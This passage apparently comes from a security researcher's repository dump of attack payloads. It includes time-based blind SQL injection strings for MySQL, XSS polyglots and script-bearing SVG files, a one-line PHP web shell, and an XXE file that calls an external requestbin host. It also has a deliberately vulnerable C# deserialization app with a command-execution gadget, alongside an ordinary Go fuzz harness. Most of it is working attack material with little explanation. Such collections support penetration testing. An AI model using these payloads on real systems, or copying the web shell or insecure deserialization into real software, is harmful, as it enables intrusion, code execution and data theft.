 22 | %20and%200=benchmark(*index*,MD5(1))%20/*
 23 | ' and 0=benchmark(*index*,MD5(1))--+
 24 | '+and+0=benchmark(*index*,MD5(1))+--+
 25 | '/**/and/**/0=benchmark(*index*,MD5(1))/**/--+
 26 | '%20and%200=benchmark(*index*,MD5(1))%20--+
 27 | +if(benchmark(*index*,MD5(1)),NULL,NULL))%20/*
 28 | +if(benchmark(*index*,MD5(1)),NULL,NULL))%20--
 29 | +if(benchmark(*index*,MD5(1)),NULL,NULL))%20%23
 30 | '+if(benchmark(*index*,MD5(1)),NULL,NULL))%20/*
 31 | '+if(benchmark(*index*,MD5(1)),NULL,NULL))%20--
 32 | '+if(benchmark(*index*,MD5(1)),NULL,NULL))%20%23
 33 | "+if(benchmark(*index*,MD5(1)),NULL,NULL))%20/*
 34 | "+if(benchmark(*index*,MD5(1)),NULL,NULL))%20--
 35 | "+if(benchmark(*index*,MD5(1)),NULL,NULL))%20%23
 36 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20/* 
 37 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20--
 38 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20%23
 39 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20/* 
 40 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20--
 41 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20%23
 42 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20/* 
 43 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20--
 44 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20%23
 45 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20/*
 46 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20--
 47 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20%23
 48 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20/*
 49 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20--
 50 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20%23
 51 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20/*
 52 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20--
 53 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20%23
 54 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
 55 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
 56 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
 57 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
 58 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
 59 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
 60 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
 61 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
 62 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
 63 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
 64 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
 65 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
 66 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
 67 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
 68 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
 69 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
 70 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
 71 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
 72 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
 73 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
 74 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
 75 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
 76 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
 77 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
 78 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
 79 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
 80 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
 81 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 82 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
 83 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 84 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 85 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
 86 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 87 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 88 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
 89 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 90 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 91 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 92 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 93 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 94 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 95 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 96 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 97 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 98 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 99 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
100 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
101 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
102 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
103 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
104 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
105 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
106 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
107 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
108 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
109 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
110 | +if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
111 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
112 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
113 | '+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
114 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
115 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
116 | "+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
117 | mysql time--
118 | 'XOR(if(now()=sysdate(),sleep(*index*),0))OR'
119 | sleep(*index*)#
120 | 1 or sleep(*index*)#
121 | " or sleep(*index*)#
122 | ' or sleep(*index*)#
123 | " or sleep(*index*)="
124 | ' or sleep(*index*)='
125 | 1) or sleep(*index*)#
126 | ") or sleep(*index*)="
127 | ') or sleep(*index*)='
128 | 1)) or sleep(*index*)#
129 | ")) or sleep(*index*)="
130 | ')) or sleep(*index*)='
131 | postgres_times---
132 | 


--------------------------------------------------------------------------------
/payloads/testsvg.svg:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" standalone="no"?>
2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
3 | 
4 | <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
5 |    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
6 |    <script type="text/javascript">
7 |       alert(document.domain);
8 |    </script>
9 | </svg>


--------------------------------------------------------------------------------
/payloads/tinyphpshell.txt:
--------------------------------------------------------------------------------
1 | <?=`$_GET[1]`?>
2 | 


--------------------------------------------------------------------------------
/payloads/xss.html:
--------------------------------------------------------------------------------
 1 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 2 | /*-/*`/*\`/*'/*"/**/
 3 | (/* */oNcliCk=alert() )
 4 | //%0D%0A%0D%0A//
 5 | </stYle/</titLe/</teXtarEa/</scRipt/--!>
 6 | \x3csVg/<sVg/oNloAd=alert()//>\x3e
 7 | <input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
 8 | <input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
 9 | <img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
10 | <a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>
11 | <math xlink:href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</math>
12 | <iframe src="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e"></iframe>
13 | <!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
14 | <style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
15 | <textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
16 | <div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
17 | var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
18 | var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';
19 | <script>//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
20 | <script>/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
21 | </script><script src="https://static.jsbin.com/js/render/edit.js?3.35.11"></script><script>jsbinShowEdit && jsbinShowEdit({"static":"https://static.jsbin.com","root":"https://jsbin.com"});</script><script>
22 | setTimeout(location.search.slice(1));
23 | jaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E
24 | var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.documentElement.innerHTML = data;
25 | var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.head.outerHTML = data;
26 | var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.write(data);document.close();
27 | <script src="https://snoopysecurity.github.io/xss" type="text/javascript"></script> 
28 | 
29 | 
30 | 
31 | 
32 | 
33 | 
34 | 
35 | 
36 | 
37 | 
38 | 


--------------------------------------------------------------------------------
/payloads/xsssvg.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" standalone="no"?>
 2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 3 | 
 4 | <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 5 |    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 6 |    <script type="text/javascript">
 7 |       alert(document.location);
 8 |    </script>
 9 | </svg>
10 | 


--------------------------------------------------------------------------------
/payloads/xxe.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="ISO-8859-1"?>
2 | <!DOCTYPE foo [
3 | <!ELEMENT foo ANY >
4 | <!ENTITY % xxe SYSTEM "http://gmlraczbr697ijnd.b.requestbin.net" >
5 | ]>
6 | <foo>&xxe;</foo>
7 | 


--------------------------------------------------------------------------------
/phppgadmin CSRF Vulnerability.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/phppgadmin CSRF Vulnerability.pdf


--------------------------------------------------------------------------------
/playground/DeserializeConsoleApp.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Xml;
 4 | using System.Xml.Serialization;
 5 | using System.IO;
 6 | using System.Text;
 7 | 
 8 | namespace DeserializeConsoleApp
 9 | {
10 | 
11 |     /*
12 | 
13 | <customRootNode>
14 | <item objectType="DeserializeConsoleApp.ExecCMD, DeserializeConsoleApp, Version=1.0.0.0,
15 | Culture=neutral, PublicKeyToken=null">
16 | <ExecCMD xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
17 | xmlns:xsd="http://www.w3.org/2001/XMLSchema">
18 | <cmd>calc.exe</cmd>
19 | </ExecCMD>
20 | </item>
21 | </customRootNode>
22 | */
23 | 
24 |     class Program
25 |     {
26 |         static void Main(string[] args)
27 |         {
28 | 
29 |             Console.WriteLine("Insert Base64 encoded XML data to Deserialize:");
30 |             var input = Console.ReadLine();
31 |             byte[] db = Convert.FromBase64String(input);
32 |             string decodedData = Encoding.UTF8.GetString(db);
33 |             CustomDeserializer(decodedData);
34 |             Console.WriteLine(decodedData);
35 |         }
36 |         static void CustomDeserializer(String myXMLString)
37 |         {
38 |             XmlDocument xmlDocument = new XmlDocument();
39 |             xmlDocument.LoadXml(myXMLString);
40 |             foreach (XmlElement xmlItem in xmlDocument.SelectNodes("customRootNode/item"))
41 |             {
42 |                 string typeName = xmlItem.GetAttribute("objectType");
43 |                 var xser = new XmlSerializer(Type.GetType(typeName));
44 |                 var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
45 |                 xser.Deserialize(reader);
46 |             }
47 |         }
48 |     }
49 | 
50 |     public class ExecCMD
51 |     {
52 |         private String _cmd;
53 |         public String cmd
54 |         {
55 |             get { return _cmd; }
56 |             set
57 |             {
58 |                 _cmd = value;
59 |                 ExecCommand();
60 |             }
61 |         }
62 | 
63 |         private void ExecCommand()
64 |         {
65 |             Process myProcess = new Process();
66 |             myProcess.StartInfo.FileName = _cmd;
67 |             myProcess.Start();
68 |             myProcess.Dispose();
69 |         }
70 |     }
71 | 
72 | 
73 | }
74 | 
75 | 


--------------------------------------------------------------------------------
/playground/fuzz.go:
--------------------------------------------------------------------------------
 1 | 
 2 |   
 3 | // +build gofuzz
 4 | 
 5 | package toml
 6 | 
 7 | func Fuzz(data []byte) int {
 8 | 	tree, err := LoadBytes(data)
 9 | 	if err != nil {
10 | 		if tree != nil {
11 | 			panic("tree must be nil if there is an error")
12 | 		}
13 | 		return 0
14 | 	}
15 | 
16 | 	str, err := tree.ToTomlString()
17 | 	if err != nil {
18 | 		if str != "" {
19 | 			panic(`str must be "" if there is an error`)
20 | 		}
21 | 		panic(err)
22 | 	}
23 | 
24 | 	tree, err = Load(str)
25 | 	if err != nil {
26 | 		if tree != nil {
27 | 			panic("tree must be nil if there is an error")
28 | 		}
29 | 		return 0
30 | 	}
31 | 
32 | 	return 1
33 | }
34 | 


--------------------------------------------------------------------------------
/playground/fuzz.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/sh
 2 | set -eu
 3 | 
 4 | go get github.com/dvyukov/go-fuzz/go-fuzz
 5 | go get github.com/dvyukov/go-fuzz/go-fuzz-build
 6 | 
 7 | if [ ! -e toml-fuzz.zip ]; then
 8 |     go-fuzz-build github.com/pelletier/go-toml
 9 | fi
10 | 
11 | rm -fr fuzz
12 | mkdir -p fuzz/corpus
13 | cp *.toml fuzz/corpus
14 | 
15 | go-fuzz -bin=toml-fuzz.zip -workdir=fuzz
16 | 


--------------------------------------------------------------------------------